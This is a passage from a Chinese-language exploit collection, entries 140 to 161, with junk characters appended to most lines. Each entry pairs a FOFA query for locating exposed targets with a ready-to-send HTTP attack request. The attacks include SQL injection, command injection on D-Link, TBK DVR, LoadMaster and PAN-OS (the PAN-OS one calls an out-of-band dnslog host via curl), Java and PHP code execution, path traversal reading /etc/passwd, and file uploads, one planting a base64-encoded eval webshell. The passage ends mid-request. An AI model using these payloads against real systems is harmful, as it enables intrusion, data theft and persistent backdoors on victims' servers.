CVE-2024-2622$ C5 F6 E/ N% @/ x0 T, A, |& Y" j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 r$ i$ Z6 W! t* O- F4 N3 i
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1$ H2 ^5 h- o; i ]8 i- L. V- j
Host: x.x.x.x1 y* ?6 j0 d* r( d% Q, y. u4 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ Q$ A& x' z" G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 w# U$ W9 }) f Q3 d( @7 }5 ^9 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 }: c, `' Q% m( A. rAccept-Encoding: gzip, deflate, br* A- ?4 M/ M; ]: i4 \" D" Q1 [
Connection: close8 E. N2 \4 X: s) o: I
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
& ?2 t) E* L) ?; ^4 N7 S, TUpgrade-Insecure-Requests: 1
0 g' M H0 T/ @; w) V
7 v+ i& A% _7 c% \; \9 l4 z2 J: q" _5 g* E. M- N3 d7 C
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入( t+ ?, s0 M3 P9 }, q0 [$ R
CVE-2024-2566+ A& x3 C R" p! E& ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) S& E# \3 v0 _, jGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
; G9 Z f2 X. ~0 Q" a# EHost: x.x.x.x- U4 g# M7 X: e+ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 {; R6 i, j( U @6 c. o+ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" T8 K* [. @) t6 A- N7 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 U' i. f2 \% X& _1 C: E2 ^( T( W C m( v
Accept-Encoding: gzip, deflate, br
! g, `2 G, U$ _8 ]Connection: close. i7 c* l6 [/ _
Cookie: authcode=h8g9
" B7 N( L; K2 L! K7 oUpgrade-Insecure-Requests: 1 \" J) M, L4 B: H* I4 O
5 ]" \- D D8 Z) T
7 `9 r& @+ H9 g6 B9 A6 _141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 w5 _9 J% o3 S& ~
FOFA:body="指挥调度管理平台"8 P; Z0 b" _) g
POST /app/ext/ajax_users.php HTTP/1.1
/ F# g5 u8 J3 C1 a& U8 {4 eHost: your-ip) l/ M e2 Y9 |% G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info s# l. ^6 e6 p! O/ i' y8 S% u6 ?
Content-Type: application/x-www-form-urlencoded
$ ^% G" h% {1 H( d/ K: a G& F' ~) L. o* Q" f/ K/ y
, e' q2 f. T- D4 G
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -. k2 `' m7 @1 ]; o! V( z
/ w4 P+ g7 H; D) e( ^4 P: E% F+ \( J( R. n2 Z0 n
142. CMSV6车辆监控平台系统中存在弱密码
: {/ x T+ |+ dCVE-2024-29666: l, B- x( {) o: g+ D& V
FOFA:body="/808gps/"
+ U' ]' ?# r" l1 sadmin/admin
0 z; l! P5 V8 O) |& _( P, T' H. O. n143. Netis WF2780 v2.1.40144 远程命令执行
0 t6 m6 M R( l' b# TCVE-2024-25850, R- {$ K" k' v* I2 J; C! Q
FOFA:title='AP setup' && header='netis'; B$ }: B* |. ^, K& `# Y
PAYLOAD
; X0 q3 t8 f- s8 ?/ F/ i8 T: v- Y5 H) N% X8 R3 `5 Q
144. D-Link nas_sharing.cgi 命令注入
: d4 P u8 z5 x( Q- d4 ^FOFA:app="D_Link-DNS-ShareCenter"2 u% y' ]4 q3 V
system参数用于传要执行的命令
% ^- p E9 {, [ ~* jGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1: l4 ^; a! m2 H" _" W
Host: x.x.x.x
" w, A! d/ `! M+ _/ y) n& m! X l( L2 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
# ?9 b( L& `" ~5 cConnection: close5 ^+ C; N: Q/ c1 \* _# u
Accept: */*
9 }# Q$ M) I8 D3 d JAccept-Language: en4 S% N" l: N2 i' X# @
Accept-Encoding: gzip
+ \; ^9 U- M# p5 O5 \
% u$ P; S/ n- y2 D0 ]# m; G! i* y l' [
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" }5 o$ m" ^7 Q2 J0 ^CVE-2024-3400
, o4 E9 R0 p, OFOFA:icon_hash="-631559155" @" [# ]8 ^, y1 _8 Z
GET /global-protect/login.esp HTTP/1.1; v t) _0 f! Y2 ?0 s& P3 C
Host: 192.168.30.112:1005" R& w: s7 L6 Q0 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
" H7 K. H! C- C7 NConnection: close* U9 h+ ^2 p4 ~4 Q' V
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
- Z7 y& H. x' MAccept-Encoding: gzip' L2 V! M4 X9 t5 I8 N7 Y
0 h2 O) ^" ^6 R) L. K( ]0 h
# {3 L; [7 H8 ^$ @146. MajorDoMo thumb.php 未授权远程代码执行! c0 T7 F; R' j/ i6 D
CNVD-2024-021755 Z' `: _1 O- `6 I# z" O
FOFA:app="MajordomoSL"4 I2 I* U l# |) l
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1+ t1 Y; X. u5 [1 X# c
Host: x.x.x.x
8 t3 i% p+ t) n) x- SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 ^" A) x6 W) b" KAccept-Charset: utf-8
, ^/ X, ^8 t+ E: t6 T' eAccept-Encoding: gzip, deflate
2 \5 \4 X% d- x0 p EConnection: close
2 ?5 ^7 U G' N4 O
; H# f# M, E6 o/ [7 j
4 ?" y; a2 ]" `; _" x/ U8 N0 k- l147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 f# H8 V6 |% @( ?
CVE-2024-32399/ u. _8 A p- Z) a
FOFA:body="RaidenMAILD": Z( O" D+ G4 @ X8 I5 Y
GET /webeditor/../../../windows/win.ini HTTP/1.1
' P4 g |( Q1 i3 l8 o5 EHost: 127.0.0.1:81
5 p: M1 ?2 D! z; @8 l, E0 oCache-Control: max-age=05 O) Y( e3 F% u8 s& i
Connection: close9 C& d: b9 k0 s8 \
$ C+ O6 b. s/ S# F/ ]; L
0 |! n8 r, y# d$ ~5 N- f148. CrushFTP 认证绕过模板注入
; V6 _% w( |* fCVE-2024-4040
4 ~& U& ^/ M- |2 z3 ^* CFOFA:body="CrushFTP"
z- ]4 U# f( a( u9 }) K9 \PAYLOAD, W+ E4 J7 [# \3 ?5 k" P( [7 f
) ` b: }* r/ k- b* M9 w' _
149. AJ-Report开源数据大屏存在远程命令执行) z4 p& ]/ {* n9 ?% w5 D7 ~1 E; k( @4 x
FOFA:title="AJ-Report") L4 U, s0 H$ K1 y- x, u
( p/ g2 u' O4 m- W6 dPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
5 R5 K% k4 Z6 m9 l3 l2 A2 s% qHost: x.x.x.x
5 b- V5 ~) H8 @7 K, }& N. MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 F# u2 V, K9 z9 e1 f8 @+ F) h# [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 o: h- M j7 O) l5 w' S7 ^; Q% \
Accept-Encoding: gzip, deflate, br
; x' Y; e* R# X3 B* r eAccept-Language: zh-CN,zh;q=0.9* @: V, W c/ d3 f
Content-Type: application/json;charset=UTF-8
! _% N$ ?2 {1 v6 j' D- ~7 |5 [Connection: close# G: Y4 i7 O! y- U; f' J2 e" O
# \+ I7 @2 G5 O& S( \. d: i Q4 {
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}1 i: m: n4 M. w. S
% ]5 g j( e( e
150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ ~) c3 V" ]$ a$ \0 c# Y5 m `. uFOFA:title="AJ-Report"8 D2 c# m# G3 `
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 p$ E: S4 p. B! K+ O2 G# }Host: x.x.x.x
3 n! k6 [% t9 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ t9 t& l9 f+ B0 ?* o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- m. v* z5 U# _* }! v) s
Accept-Encoding: gzip, deflate, br d0 C) P4 ?( Q
Accept-Language: zh-CN,zh;q=0.9
) t$ Y( @! p/ }3 H4 V ?Content-Type: application/json;charset=UTF-8' ~0 k9 l" I) L' Q m
Connection: close3 P- N3 `$ E: ~5 t9 p
Content-Length: 3393 y( I/ V) w% ^! @( L
! y7 [! X; F K0 N{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 y3 k5 u- ~+ B ~0 u/ E
* S( F/ i, L( B. a, n% T
9 `8 p. B. f/ K, i2 v2 p
151. AJ-Report 1.4.1 pageList sql注入
% M" p2 f% \' |0 h& z( o2 hFOFA:title="AJ-Report"9 K, Y5 x1 ?2 u# j/ I
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.12 w& z8 w& U8 C- O; N
Host: x.x.x.x
. J3 L% O' m f( }1 @* jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 v/ r) k4 s; e* L2 KConnection: close9 u q4 z7 b3 p
Accept-Encoding: gzip
( t6 l: D1 B l
" f; z% L( E) k& d( ], _7 z3 l4 r, T8 b& n
152. Progress Kemp LoadMaster 远程命令执行
8 p: y, q2 a# q: A* ^CVE-2024-1212: w+ a- u/ m+ J' u2 l
LoadMaster <= 7.2.59.2 (GA)
& n9 D0 w! M' r+ c% d4 L! jLoadMaster<=7.2.54.8 (LTSF)
" @. j7 g" @, t5 s+ f! ZLoadMaster <= 7.2.48.10 (LTS)
& K& H5 k5 r# I! W$ zFOFA:body="LoadMaster"0 ^( K: R1 X' m' q$ w- Q; v/ I( G. C
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
6 W/ |5 T5 t6 h$ k, ?GET /access/set?param=enableapi&value=1 HTTP/1.1 {$ y# x2 o1 J j& E
Host: x.x.x.x( {! g) _4 U$ `" k( a" H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
& m" [) H j) b- t, _6 A7 {Connection: close$ g5 ?6 h* E3 w* i" n
Accept: */*, R' h% ?1 e3 ?" D' |0 q, g
Accept-Language: en9 Y( h3 _2 U% N1 d+ G
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=5 c, z, s! {; B! O5 k) W6 u
Accept-Encoding: gzip% e3 b% j- N7 j, W+ k
. Z2 i- x+ y7 }% ?0 ?6 q; n0 e6 P6 F0 H# u2 h3 e( h
153. gradio任意文件读取
! E7 k% I7 j1 f# P8 Q" YCVE-2024-1561FOFA:body="__gradio_mode__"0 a- c4 h: Q% {& b2 F/ p! o9 M
第一步,请求/config文件获取componets的id
, W* l7 c8 v/ v: ahttp://x.x.x.x/config
?6 s2 p) X! j
9 O# ~- q! k. f. c5 ?
+ T. R+ Q1 q ^第二步,将/etc/passwd的内容写入到一个临时文件5 a) I) y& G2 p& R3 a
POST /component_server HTTP/1.10 }0 x4 ~) r5 u* o! J
Host: x.x.x.x
3 c. _1 u* ~$ y( f% x/ k( JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3/ Z, g3 q4 D- P7 ^' Y8 X
Connection: close1 |1 D4 L5 f! _# p
Content-Length: 115: d" i$ D: o) d2 U& m; V S; _# l' w( Q
Content-Type: application/json; j( r( \: { B4 n
Accept-Encoding: gzip9 z4 b2 {& h4 i- ]
/ y8 ^9 A* t4 e$ ~4 ~{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}! M: D3 q7 z) L+ u" v% k
# y7 {9 ?% S$ i. }: [8 Y" r. X
/ R) D v- N5 W; T5 d第三步访问
# R" r7 P0 U, C; e6 [- Q8 C, ?http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd3 w4 n8 P0 \, E# i
* v( |, ^# j( ?& v/ A: ]+ O
0 U: }4 R, ]9 C2 r
154. 天维尔消防救援作战调度平台 SQL注入
O* `$ c' f( i5 y( n: c a3 w4 ]+ T; lCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
: E& }3 B1 s& e5 I- F$ g7 H7 zPOST /twms-service-mfs/mfsNotice/page HTTP/1.16 I6 s! O. [8 L* W1 p4 \6 F. n" M
Host: x.x.x.x
' ?2 s- I* q. sContent-Length: 106% K: z# I1 \0 @6 Q) A/ H3 E
Cache-Control: max-age=0
; d; z) H7 f u7 B o" A5 K/ X6 FUpgrade-Insecure-Requests: 1. \+ M* u& f9 n" D! J/ B
Origin: http://x.x.x.x
9 x5 o9 ?0 p; W- `$ L q5 GContent-Type: application/json* K( Q; T& h; D- ]4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
7 X% ~3 Y; c6 D" j- y+ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. N3 E F) f' E: A, o
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
3 p; Y" s. v8 j+ w" kAccept-Encoding: gzip, deflate
3 @- m5 l4 `; r6 LAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
3 g. e1 Q" Z: t, e6 CConnection: close" [/ b& F3 X" L. `; G e( O
; }5 f. |) k- z- v
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}; Z+ b- a5 z7 J" M/ R8 d Q
6 o& W: q, M2 D" Z7 i' U
3 F8 @* A& F: F155. 六零导航页 file.php 任意文件上传
7 m. f0 m5 a) F1 g: O4 N6 }) _( iCVE-2024-34982
$ F P" s) L' {FOFA:title=="上网导航 - LyLme Spage"
0 K% w3 R. _! N% w; XPOST /include/file.php HTTP/1.1
+ P. @5 e( S1 \+ V6 N6 T2 \( gHost: x.x.x.x, R, J1 C8 ~7 m2 _2 ~" l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 w; g$ r" t9 O c4 v/ T0 S* g
Connection: close
2 S; b5 W. a7 P% J3 @( {* F( KContent-Length: 232! r" M* A& a+ ]$ n: V
Accept: application/json, text/javascript, */*; q=0.01
6 o* }) V5 ]0 X) ~Accept-Encoding: gzip, deflate, br
0 C) h3 L; Q% }, @+ E6 k; DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 \# F0 _. V) I# U' q9 J6 c' o$ D7 XContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f/ k1 x+ F+ `4 w1 B
X-Requested-With: XMLHttpRequest
* }7 h9 E' h- d/ J* ?
! K0 w9 K, Q x8 }-----------------------------qttl7vemrsold314zg0f
( z0 S2 c1 l9 A0 G1 @Content-Disposition: form-data; name="file"; filename="test.php", [) B$ e! U0 @
Content-Type: image/png+ W" P- G# {8 p, k4 X) X
! B, R6 e+ x/ D' }
<?php phpinfo();unlink(__FILE__);?>
% k* I9 S$ i( B# p" i' U-----------------------------qttl7vemrsold314zg0f--$ |9 r4 M! n8 p- J
X( A) J" B6 ?/ ]. W% T1 N8 k* e
2 h- m* d; u. p3 W访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php% g& ]6 R0 p# W* I9 w
. B; s: Y% _, I% a* B
156. TBK DVR-4104/DVR-4216 操作系统命令注入
, g4 F" G- }, P" A3 E, `2 F) M. SCVE-2024-3721
, F9 ^0 o2 \1 ~: D" oFOFA:"Location: /login.rsp"; s; |; [' T6 l. |- E: z
·TBK DVR-41046 B( |& R$ T7 q( F. N
·TBK DVR-4216( r, Y" y" F2 Z0 U" B% w
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
6 Q" E4 e ?; R- d$ ^/ l- |- Y4 ?
* l& J/ w, O- D2 r; w/ O, L+ z* y
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
3 f) O4 @* [: n7 YHost: x.x.x.x
1 \# U) b$ o4 f* w# H" I/ tUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 [; o# A3 D2 t0 ~8 l7 g
Connection: close; T! _: h& U# W4 I2 t G( x
Content-Length: 0
. j7 F2 J# A R! w7 Z. xCookie: uid=1
3 v0 s" n# G$ l& ~8 NAccept-Encoding: gzip1 y# b) L/ v1 @2 s
- [. m E4 e" H9 g( Y
' Q+ F: X' N" D5 \2 P157. 美特CRM upload.jsp 任意文件上传
' L' ^3 o$ [* B2 N8 }3 ]CNVD-2023-069718 z! @ e. i" u4 |, l
FOFA:body="/common/scripts/basic.js"
& `7 ?# F. n6 {/ \" q& k2 Q1 h0 EPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1- E+ {9 E* P. T
Host: x.x.x.x
8 d1 M( D& _+ h* @' q4 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36; {/ H& }8 f+ f
Content-Length: 709
& ]: ~( }3 F/ V( c2 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 W, j! S3 R! q' W, mAccept-Encoding: gzip, deflate
3 d3 R" Y. z cAccept-Language: zh-CN,zh;q=0.9
+ W1 Y, C+ H# A- g( CCache-Control: max-age=0* s( `3 q5 h; O" D: Q
Connection: close9 ^) c' K% m i% C! e' @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN; {) w8 i8 u8 B& G. y+ y
Upgrade-Insecure-Requests: 1
. ?9 P2 ?) u- N* A" x/ n
! ^0 l- o9 m8 R: ^# u( y------WebKitFormBoundary1imovELzPsfzp5dN( `1 [) T8 U) r' [
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
6 S* M# x z; g7 [; U% K$ }5 zContent-Type: application/octet-stream% n9 o: L& q7 X/ T
) A3 x3 l9 B1 T! N( N% gnyhelxrutzwhrsvsrafb
! @2 v3 h7 m7 r------WebKitFormBoundary1imovELzPsfzp5dN* Z7 {$ L* m' R# J% o$ Q
Content-Disposition: form-data; name="key"6 \, h( `/ x/ f2 n
" ]6 X, N- Y A) g |
null3 b7 s. V$ n# `% l. E5 v( I
------WebKitFormBoundary1imovELzPsfzp5dN
' e% q2 L2 a3 j, P1 yContent-Disposition: form-data; name="form"' {4 l5 q" _6 q# s
! I, n0 S/ ?8 x# \0 l- z
null2 T! m3 J7 W$ [$ E- |3 c9 n; K0 D7 P
------WebKitFormBoundary1imovELzPsfzp5dN
; d$ s. b* Q2 m& \" L8 i3 s- @Content-Disposition: form-data; name="field"
9 U( k, W: M ^ Z6 w* D9 f4 L* B6 c3 [. O
null, x9 v, ]8 Z! G5 D8 K$ H
------WebKitFormBoundary1imovELzPsfzp5dN7 T% }( N T) I
Content-Disposition: form-data; name="filetitile"% _5 s( p7 h5 i* M- I( O, M
- h$ e, n! I2 @8 H. j& A) s$ l# lnull5 p' c) K2 t0 m8 F% c V
------WebKitFormBoundary1imovELzPsfzp5dN' s& p1 l3 j E5 }7 \: [
Content-Disposition: form-data; name="filefolder"
* Z) m! v0 q- [7 C$ C% w+ y: H3 k" {7 u. T( P+ n3 [; V( e9 H
null
7 R1 w) C. k2 q" c& H4 P' h! E------WebKitFormBoundary1imovELzPsfzp5dN--
) q; p; J" L' G6 l; |. H& U) S, v- x$ r* y7 V
% i6 w7 u& v2 T3 f- Chttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp& k2 P8 K7 O: x, F/ t( O
5 a3 S4 Y1 L! ]6 D' g158. Mura-CMS-processAsyncObject存在SQL注入4 I0 [" Q# U8 |4 n0 c
CVE-2024-32640) G" z# y4 _* `
FOFA:"Generator: Masa CMS"
! t @4 K0 c- U- l! U0 yPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ K- V f2 z1 Z9 ]Host: {{Hostname}}; ~$ V% w7 S1 K, l" P( `
Content-Type: application/x-www-form-urlencoded' i+ I" X3 U' w
4 j: {5 f) K7 zobject=displayregion&contenthistid=x\'&previewid=1- O$ f* E0 F) U- y* Y4 _
1 x! J b9 N" F0 k) |& x0 f
& k5 N& S+ `$ c* W; I159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
1 i& ~- I2 K% FFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")! y- e6 A% t& n8 a
POST /webservices/WebJobUpload.asmx HTTP/1.1( T3 U4 H8 w' b
Host: x.x.x.x
+ |! X4 r$ ^8 }; b4 r" uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36# m9 ~0 x( s. m4 s9 n
Content-Length: 10807 E( O$ Y3 }/ t
Accept-Encoding: gzip, deflate
& w( c& ?3 B5 \, @4 W9 |Connection: close% h% t. o- H+ Y" U, o9 M# g
Content-Type: text/xml; charset=utf-8( r J$ n1 o; l& L+ @+ O7 n
Soapaction: "http://rainier/jobUpload"
( T Q7 s2 e9 v& M3 O" i6 J& N+ i, \7 Z/ G
<?xml version="1.0" encoding="utf-8"?>
" _+ z" t% v2 o0 u& U( {+ |<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! ^) {0 {1 k- J h<soap:Body>* H- x: x5 p1 L8 N; F
<jobUpload xmlns="http://rainier">
& ^( @0 q: \. y0 v T4 a+ K+ d' V<vcode>1</vcode>
7 W. e. e5 f- @" q: @6 O<subFolder></subFolder>9 M5 |" L7 D' ?0 w _: |/ X- ~
<fileName>abcrce.asmx</fileName>
+ {' H: x- m0 Y, x5 k2 X4 m: v" n+ \<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
: J" \( J; T: U, k</jobUpload>
! t( X7 |( K$ N7 D+ A</soap:Body>
; K$ t' K8 n/ b+ ~; `2 ^6 h</soap:Envelope>( V6 z" G7 o9 v, u# _2 N
4 q% @9 m2 d7 E" K1 u2 X
, B0 g# V+ m8 X% v# {+ g/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
3 ?7 H2 _! B o s: k* r4 o6 k
9 M. X+ P! V: {" X( F
$ x$ {" N! a. z+ |" J160. Sonatype Nexus Repository 3目录遍历与文件读取
1 Z1 C% U4 w& \7 _7 I eCVE-2024-4956/ K: O1 ^1 N) L Z3 [2 S
FOFA:title="Nexus Repository Manager"
6 l% M' t* ~- s. Q* o% V L) DGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
- R* t( ~0 s. b0 [* T* {$ dHost: x.x.x.x
/ Y* S* k- b% _1 G' BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0: m6 n( D- n4 X. ]. `; I
Connection: close
+ O) A; P( L+ b& a7 c JAccept: */*7 D7 i* ` w. d
Accept-Language: en3 F6 H9 u! e; |: m
Accept-Encoding: gzip: V4 y0 K! b8 C! _7 O6 W
# g* ~9 Z$ Q0 N( w2 f N- N, O+ ~
. [' |$ H2 g9 G0 }) p0 l161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
" [: _( `: U# p3 O( p$ _FOFA:body="/KT_Css/qd_defaul.css"
; [8 ~+ e8 K7 d: F第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
( J8 M5 [8 p3 XPOST /Webservice.asmx HTTP/1.1# o3 K9 W: N% o' g
Host: x.x.x.x6 b3 u* m5 Q/ n! T/ V% r) y b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ J! |# L( ?. O; b) C/ f! m; @Connection: close
1 x8 q' @) T3 ~1 C# F% f) C% ZContent-Length: 4453 D" G* C0 z. T, U0 r9 n
Content-Type: text/xml
& Z9 @5 P% }- kAccept-Encoding: gzip
% Z5 q& ]6 W3 v; @& F* l
" P" L. b9 y+ F<?xml version="1.0" encoding="utf-8"?>
8 ~5 x! X! t/ C' h<soap:Envelope xmlns:xsi="6 r' d3 b# c2 v7 F! a- l" [
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
* L3 x; y- H' E8 {6 x; @xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 U& g$ M' I l5 U2 R/ d
<soap:Body>; \# v7 c6 W3 g% A4 L+ {: {
<UploadResume xmlns="http://tempuri.org/">
' d8 b* n6 p: M( H/ C; \' |+ |<ip>1</ip>
* w+ C4 [1 E/ ]' k2 t# v7 v4 i<fileName>../../../../dizxdell.aspx</fileName>
